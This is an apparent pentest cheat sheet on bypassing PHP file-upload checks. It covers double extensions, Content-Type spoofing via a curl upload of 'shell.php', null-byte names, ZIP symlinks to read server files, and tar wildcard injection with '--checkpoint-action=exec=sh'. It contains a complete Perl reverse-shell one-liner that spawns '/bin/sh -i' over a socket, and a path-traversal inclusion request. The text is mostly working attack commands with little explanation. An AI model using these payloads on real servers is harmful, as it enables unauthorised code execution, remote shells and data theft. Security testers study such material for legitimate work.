File Upload

File Upload are well known and kinda old PHP vulnerabilities but can still work some times

Double Extension

# If the target is only checking extension
→ exploit.php.jpg


# Classical, using Burp for example
Content-Type: application/x-php → Content-Type: image/gif

# Using cURL
curl -i -F "file=@shell.php;type=image/gif" --cookie "..." "<target>"

# You can also create or update the following registry key on Windows

# Then create a “String” type registry key and, named “Content-Type" and set the value “image/gif”

Null Byte

→ exploit.php%00.jpg

ZIP Upload

# You can get resources through ZIP upload and symlinks
ln -s ../../../index.php link
zip --symlinks link

Wildcard & tar exploit

# If the server is using tar and wildcard (*) on uploaded files, you can exploit it by uploading 3 files :
• --checkpoint-action=exec=sh
• --checkpoint=1

# the file contains a payload (different exploit are possible) :
• cat "path/index.php" > index.txt
• #!/bin/sh
perl -e 'use Socket;$i="";$p=15975;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
• tar cvf admin.tar ../../../admin


curl -X POST "http://xxx?page=../upload/ucdn6sCjDxredw1.png&0=readfile" --cookie "<cookie>" -d "1=index.php" --output res